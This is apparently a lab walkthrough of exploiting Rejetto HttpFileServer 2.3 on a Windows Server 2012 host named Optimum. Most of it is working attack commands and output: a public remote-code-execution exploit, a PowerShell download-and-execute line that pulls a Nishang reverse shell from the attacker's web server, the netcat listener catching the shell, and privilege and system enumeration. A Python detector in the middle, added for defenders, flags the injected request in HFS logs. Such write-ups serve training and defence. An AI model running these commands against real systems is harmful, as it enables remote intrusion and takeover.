2 :80

HttpFileServer 2.3

$ searchsploit httpfileserver
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                              |  Path
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)                                                                                 | windows/webapps/49125.py
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1


$ python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18/rev.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|c%3A%5Cwindows%5CSysNative%5CWindowsPowershell%5Cv1.0%5Cpowershell.exe%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//10.10.14.18/rev.ps1%27%29.}
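The request the exploit emitted above is also what a defender should be hunting for in HFS access logs: a NUL byte (`%00`) in the `search` parameter followed by HFS macro syntax (`{. ... .}`) that names `exec`. The following detector is an added example, not part of the original write-up; the log lines are constructed in a combined-log style (the second one carries the exact request target shown above), and the macro regex and the ALERT/SUSPICIOUS classification are a heuristic of my own rather than anything HFS or the exploit defines.

```python
# Added example: flag HFS 2.3.x search-parameter macro injection in access logs.
# Not from the original write-up. SAMPLE_LOG below is constructed; the exploit
# request target is copied from the URL the exploit printed.
import re
from urllib.parse import urlsplit, parse_qs

# Opening of an HFS macro: "{." then optional whitespace then the macro name.
# (The exploit sends "{.+exec|..." where "+" decodes to a space.)
MACRO_RE = re.compile(r"\{\.\s*([A-Za-z_]+)")

# Request line of a combined-format log entry: "GET /path?query HTTP/1.1"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def analyze_target(target: str) -> dict:
    """Inspect one request target (path plus query) and return indicators."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    indicators = {"null_byte": False, "macros": [], "exec_macro": False}
    for values in params.values():
        for value in values:  # parse_qs has already percent-decoded the value
            if "\x00" in value:
                indicators["null_byte"] = True  # %00 used to truncate the search filter
            indicators["macros"].extend(n.lower() for n in MACRO_RE.findall(value))
    indicators["exec_macro"] = "exec" in indicators["macros"]
    return indicators


def classify(indicators: dict) -> str:
    """Heuristic verdict (assumed thresholds, not an HFS-defined rule)."""
    if indicators["exec_macro"]:
        return "ALERT"       # macro injection that reaches command execution
    if indicators["macros"] or indicators["null_byte"]:
        return "SUSPICIOUS"  # macro syntax or NUL truncation without exec
    return "OK"


def scan_log(lines):
    """Return (verdict, target, indicators) for every non-OK request line."""
    hits = []
    for line in lines:
        match = REQ_RE.search(line)
        if not match:
            continue
        indicators = analyze_target(match.group("target"))
        verdict = classify(indicators)
        if verdict != "OK":
            hits.append((verdict, match.group("target"), indicators))
    return hits


# Constructed sample log: one benign search, the exploit request from above,
# a NUL-only probe, and an unrelated request.
SAMPLE_LOG = [
    '10.10.14.18 - - [08/May/2021:11:30:01 +0000] "GET /?search=report.pdf HTTP/1.1" 200 1420 "-" "Mozilla/5.0"',
    '10.10.14.18 - - [08/May/2021:11:33:38 +0000] "GET /?search=%00{.+exec|c%3A%5Cwindows%5CSysNative%5CWindowsPowershell%5Cv1.0%5Cpowershell.exe%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//10.10.14.18/rev.ps1%27%29.} HTTP/1.1" 200 0 "-" "python-requests/2.25"',
    '10.10.14.18 - - [08/May/2021:11:33:40 +0000] "GET /?search=%00test HTTP/1.1" 200 980 "-" "python-requests/2.25"',
    '10.10.14.18 - - [08/May/2021:11:33:41 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, target, indicators in scan_log(SAMPLE_LOG):
        print(f"{verdict:10} macros={indicators['macros']} null_byte={indicators['null_byte']} {target[:60]}")
```

Running the block prints an ALERT for the exploit request (NUL byte plus an `exec` macro) and a SUSPICIOUS for the NUL-only probe; the benign search and the favicon request are silent. Because `parse_qs` percent-decodes before the regex runs, encoding the braces or the macro name differently does not hide the pattern.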

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -

$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.8] 49162
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami
optimum\kostas

whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

systeminfo

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 31 Hotfix(s) Installed.

cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v*
v1.0.3705
v1.1.4322
v2.0.50727
v4.0.30319
